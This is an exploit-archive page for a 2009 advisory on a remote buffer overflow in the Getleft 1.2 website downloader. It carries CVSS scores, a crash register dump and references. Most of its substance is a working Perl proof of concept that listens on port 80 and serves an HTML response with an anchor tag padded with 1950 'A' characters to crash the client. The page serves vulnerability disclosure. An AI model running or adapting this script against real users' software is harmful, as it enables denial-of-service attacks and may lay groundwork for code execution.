Getleft 1.2 Remote Buffer Overflow Proof of Concept

2009.08.06
Credit: Koshi
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # # Getleft v1.2.0.0 DoS PoC # Author: Koshi # # Application: Getleft v1.2 # Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html ) # Description: Website Downloader, for such things as offline browsing. # Tested On: Windows XP SP2 # # Module: Getleft.exe # eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170 # eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 # # Getleft+0x863eb: # 004863eb 8b06 mov eax,dword ptr [esi] ds:0023:00000000=???????? # # <embed src=>, <img src=>, <script src=>, <body background=> # Plenty of other tags will work as well. I'm not so sure about # code execution, I'll have to try a few other things. # use IO::Socket; my $body = "<a href=\x22/abcd.jpg\x22>" ."A"x1950 ."</a>"; my $resp = "". "HTTP/1.1 200 OK\r\n". "Server: Apache\r\n". "Date: Mon, 22 Dec 2008 21:50:46 GMT\r\n". "Content-Type: text/html\r\n". "Accept-Ranges: bytes\r\n". "Last-Modified: Mon, 22 Dec 2008 21:45:46 GMT\r\n". "Content-Length: " .length($body) ."\r\n". "Connection: close\r\n\r\n". "$body\r\n"; for ($i = 2; $i >= 1; $i--) { my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, ); print "Listening...\n"; my $new_sock = $sock->accept(); print "Connected...\n"; my $sock_addr = recv($new_sock,$msg,190,0); print "Sending ...\n"; print $new_sock "$resp"; print "Sent!\n"; close($sock); print "Closed.\r\n\r\n"; }

References:

http://xforce.iss.net/xforce/xfdb/47597
http://www.securityfocus.com/bid/32994
http://www.milw0rm.com/exploits/7564


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top